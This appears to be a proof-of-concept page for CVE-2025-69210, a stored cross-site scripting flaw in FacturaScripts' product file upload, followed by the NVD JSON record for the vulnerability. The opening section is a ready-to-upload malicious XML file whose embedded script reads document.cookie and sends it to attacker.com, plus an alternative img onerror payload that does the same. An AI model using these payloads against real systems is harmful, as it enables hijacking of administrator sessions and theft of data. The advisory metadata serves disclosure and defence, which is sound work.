CVE-2025-69210

<!-- CVE-2025-69210 PoC - Malicious XML file with XSS payload --> <!-- Upload this file through FacturaScripts product file upload functionality --> <?xml version="1.0" encoding="UTF-8"?> <product> <name>Test Product</name> <description><![CDATA[ <script> // Steal session cookies var cookies = document.cookie; fetch('https://attacker.com/steal?data=' + btoa(cookies)); // Perform actions as admin // Example: Create new admin user or exfiltrate sensitive data console.log('XSS Payload Executed'); </script> ]]></description> <price>99.99</price> </product> <!-- Alternative payload using event handlers --> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

{"cve": {"id": "CVE-2025-69210", "sourceIdentifier": "[email protected]", "published": "2025-12-30T20:16:01.697", "lastModified": "2026-02-23T15:23:12.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. Version 2025.7 fixes the issue."}, {"lang": "es", "value": "FacturaScripts es un software de código abierto de planificación de recursos empresariales y contabilidad. Antes de la versión 2025.7, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en la funcionalidad de carga de archivos del producto. Usuarios autenticados pueden cargar archivos XML manipulados que contienen JavaScript ejecutable. Estos archivos son posteriormente renderizados por la aplicación sin suficiente saneamiento o aplicación del tipo de contenido, permitiendo la ejecución arbitraria de JavaScript cuando se accede al archivo. Debido a que los archivos del producto cargados por usuarios regulares son visibles para los usuarios administrativos, esta vulnerabilidad puede ser aprovechada para ejecutar JavaScript malicioso en la sesión del navegador de un administrador. La versión 2025.7 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.7", "matchCriteriaId": "FEEE032D-0FA6-4BA9-806E-71BB06FB8729"}]}]}], "references": [{"url": "https://facturascripts.com/publicaciones/ya-disponible-facturascripts-2025-7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-2267-xqcf-gw2m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}